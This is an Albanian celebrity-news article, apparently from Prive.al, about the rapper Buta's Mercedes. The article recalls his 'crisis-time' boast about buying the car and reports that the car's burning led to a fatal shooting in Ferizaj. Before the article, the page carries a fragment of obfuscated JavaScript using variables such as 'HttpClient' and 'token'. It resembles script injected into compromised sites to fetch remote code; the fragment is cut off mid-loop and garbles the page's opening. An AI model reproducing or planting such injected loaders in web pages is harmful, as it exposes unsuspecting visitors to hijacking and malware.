;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

U bë ‘molla e sherrit’, ç’thoshte Buta për Mercedes-in kur e bleu?

By

Buta theu sot heshtjen, dy ditë pas ngjarjes tragjike që tronditi të gjithë Ferizajin dhe Kosovën ku nga vëllai i reperit mbeti i vrarë ish-shoku i tyre i ngushtë, Gazmend Hyseni.

Ai i falenderoi për ‘mesazhet mbështetëse’ për vëllain e tij, Qëndrimin dhe sigurisht, pati një sulm aty ku mund të drejtohet më së lehti – tek mediat.

Reperi i kritikoi mediat për raportimet mbi ngjarjen që ndodhi për shkak të djegies së veturës së Butës, vepër për të cilën dorasi dyshonte se ka ndodhur nga Strella.

Vetura e tipit “Mercedes S Class” u ble vitin e kaluar nga reperi.

Në mes të pandemisë, në muajin mars, ai u bë me këtë makinë të re në vlerë gati njëqind mijë euro.

Atëbotë, për “mollën e sherrit”, Buta ironizonte përmes një postimi në Instagram.

Nga autosalloni, reperi ishte shprehur:

“Kush tha që o krizë?” – duke aluduar në këtë formë për shpenzimin marramendës në një kohë kur artistët ende ishin tërësisht të bllokuar në koncerte e data shkaku i pandemisë.

Tragjikisht, 14 muaj pas, kjo blerje në “kohë krize” u bë molla e sherrit me një të vrarë dhe një tjetër që në moshën më të mirë, supozohet që do kalojë vite të tëra në burg për veprën e kryer. /Prive.al

Artikuj të ngjashëm